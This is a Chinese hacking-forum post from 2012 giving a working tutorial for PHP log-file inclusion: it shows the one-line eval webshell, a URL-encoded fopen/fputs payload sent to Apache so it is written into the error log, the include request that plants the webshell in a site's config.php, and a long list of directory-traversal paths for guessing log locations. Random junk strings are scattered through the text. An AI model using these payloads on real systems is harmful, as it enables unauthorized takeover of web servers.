找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2047|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ! t7 Q' s6 M0 G0 ^1 l/ A" V" p+ q

  k; E; H2 a# a  L8 ~! V比如还是这句一句话木马
2 _" `# E; a& h$ d; O9 x<?eval($_POST[cmd]);?>   
& U, u- `8 d; k- T( O% }! P1 p7 t% C/ Q6 U' l
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, ; H3 K5 R: }* ]; q2 r9 Y
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
0 r9 C* H2 D* y) ^- {$ q( {; v0 |& G2 B+ p
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
9 R% }- @3 P0 x4 Wfclose($fp);?>   //在config.php里写入一句木马语句
# O, v! v+ B2 U* H
# g( ?6 P" ~4 L, ?0 F! @5 g我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
* v) s4 s5 C; T, Y! i' R转换为 8 Y9 P6 p7 p0 r( q! \
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
0 r5 l/ ?4 I5 T. @# k/ Nconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp % F% ?7 k4 L& r; Y* H
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 5 v, A5 s6 c. I$ D, n. G& o! v
fclose%28%24fp%29%3B%3F%3E
' P/ t* Y6 ^8 T& D) U9 Q我们提交 0 J9 ~3 ], G( r& t( Z2 y  s
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww / [+ l( @6 p# V' W+ {* B. S0 \- \4 n/ n
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
& W) \1 f% W+ ]%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
& u9 A1 l3 l2 O. z2 Mcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
0 I: }  C3 t: c3 T7 ?. O, Y/ K: u1 ?/ m
这样就错误日志里就记录下了这行写入webshell的代码。 7 n& A3 N9 x) {4 n! o+ N
我们再来包含日志,提交 5 E* t/ Q; `. f6 a
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log & C( h2 E2 y# o; K0 X5 p1 X

* Q0 |3 y$ L& o( |这样webshell就写入成功了,config.php里就写入一句木马语句
- }8 I( }' b$ G7 l. FOK.
& b  e1 x, ^! M% J1 \% @. ohttp://www.xxx.com/forum/config.php这个就成了我们的webshell
+ x8 G- K& M$ I直接用lanker的客户端一连,主机就是你的了。
5 Y! B/ T3 E, {6 C& B3 N4 o7 H
: U7 e7 p+ z- e0 v4 C& J6 s2 PPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 $ O2 y& c* b4 }# }8 J

1 N8 b, J, d: C/ F2 a, w其他的日志路径,你可以去猜,也可以参照这里。 & @; T- a3 i0 S- }) H+ t) [
../../../../../../../../../../var/log/httpd/access_log
$ z8 @) Q+ I  y+ l../../../../../../../../../../var/log/httpd/error_log $ a4 [* H  t5 F  l
../apache/logs/error.log
1 v. k0 `$ n4 R) a8 Y; d../apache/logs/access.log
) _$ Y3 r; R' x( u  x../../apache/logs/error.log 6 U) ^0 K' S$ q; K  {, c
../../apache/logs/access.log ( \3 n" F0 l0 G) |
../../../apache/logs/error.log
3 L$ E" Z; d# @../../../apache/logs/access.log
, @* |  _  m7 ?4 v2 N3 H../../../../../../../../../../etc/httpd/logs/acces_log
2 F1 B+ r; ~; w  E../../../../../../../../../../etc/httpd/logs/acces.log ' V* {# W# \4 M
../../../../../../../../../../etc/httpd/logs/error_log
5 V$ M2 ^+ r9 m1 b6 w: }../../../../../../../../../../etc/httpd/logs/error.log
  c1 |' r' `4 r../../../../../../../../../../var/www/logs/access_log * H0 d3 n  ^* A$ ]1 E6 b
../../../../../../../../../../var/www/logs/access.log
4 T; k  b1 P1 l; b* b8 u../../../../../../../../../../usr/local/apache/logs/access_log . }* R: V9 X, e5 Y. \  C
../../../../../../../../../../usr/local/apache/logs/access.log
* O$ l$ D9 L$ C7 F../../../../../../../../../../var/log/apache/access_log
' A2 u) s2 c. A3 F../../../../../../../../../../var/log/apache/access.log + G9 l6 T2 @% T+ S: ]" U% G% j5 ^
../../../../../../../../../../var/log/access_log
  A/ O4 o2 y1 M* x" K../../../../../../../../../../var/www/logs/error_log / @; F# U. c/ P: Y- z
../../../../../../../../../../var/www/logs/error.log
6 f! l) X! x. F../../../../../../../../../../usr/local/apache/logs/error_log 2 h( V) F( h1 M
../../../../../../../../../../usr/local/apache/logs/error.log
# H; h. a6 F) C6 r- E! t../../../../../../../../../../var/log/apache/error_log
3 x; K. J  s/ E2 r../../../../../../../../../../var/log/apache/error.log   u4 o0 c% }" B) h; u& d
../../../../../../../../../../var/log/access_log
& a3 d! W0 [0 J! N../../../../../../../../../../var/log/error_log , L$ s  A: \; C; \5 g6 q( |. W9 l: c1 T
/var/log/httpd/access_log      
: o  E& P! P( e4 `, f* I/var/log/httpd/error_log     
6 I* B, Y) i2 H8 y../apache/logs/error.log     % u9 G& c- n% S0 E3 |! f
../apache/logs/access.log ( f/ f; x! T: y" l. R5 O
../../apache/logs/error.log
0 F" P' s5 }5 R( ^" ?4 X/ J, l../../apache/logs/access.log
9 V9 o8 K! h; f: D5 b+ j  l8 U../../../apache/logs/error.log " [3 K! v0 O; r7 i1 S. W6 Z
../../../apache/logs/access.log ; D! e" b% T: ?* e- W
/etc/httpd/logs/acces_log
3 ~& ?! w8 V/ i# r1 z( a; ]/ L* e/etc/httpd/logs/acces.log
! Q. O0 V$ u* [/ H/etc/httpd/logs/error_log - |; T2 N" U2 ]2 H) z9 u
/etc/httpd/logs/error.log
  h1 O" m$ ~- ]* _8 F5 e/var/www/logs/access_log
! y7 K9 {4 [2 U2 _2 z& _* X) h5 Y/var/www/logs/access.log
7 ^- G0 v/ N5 [2 e6 B4 M7 `* \/usr/local/apache/logs/access_log
: E6 P8 U# n  N" {/usr/local/apache/logs/access.log * u+ A2 X$ \6 Q, N
/var/log/apache/access_log
* c3 T0 T) Z* A7 ]/var/log/apache/access.log & ]  ^2 _4 O9 k, z
/var/log/access_log % @  o7 A! m% Y- S% H
/var/www/logs/error_log
! i* c% T1 I0 H. u9 F9 c8 M/var/www/logs/error.log 5 W" w: \8 S8 D  ~/ }& c0 L) C$ U
/usr/local/apache/logs/error_log
% X6 ]  H- Y& d6 `0 K7 n0 B9 K/usr/local/apache/logs/error.log 6 ?6 W( t" ]& e5 g2 Q4 J
/var/log/apache/error_log ' D1 a0 r4 I: U# C
/var/log/apache/error.log
: u: D* x* d0 ~. m5 n/var/log/access_log 6 G0 u2 Y* q3 A/ N, }' D
/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表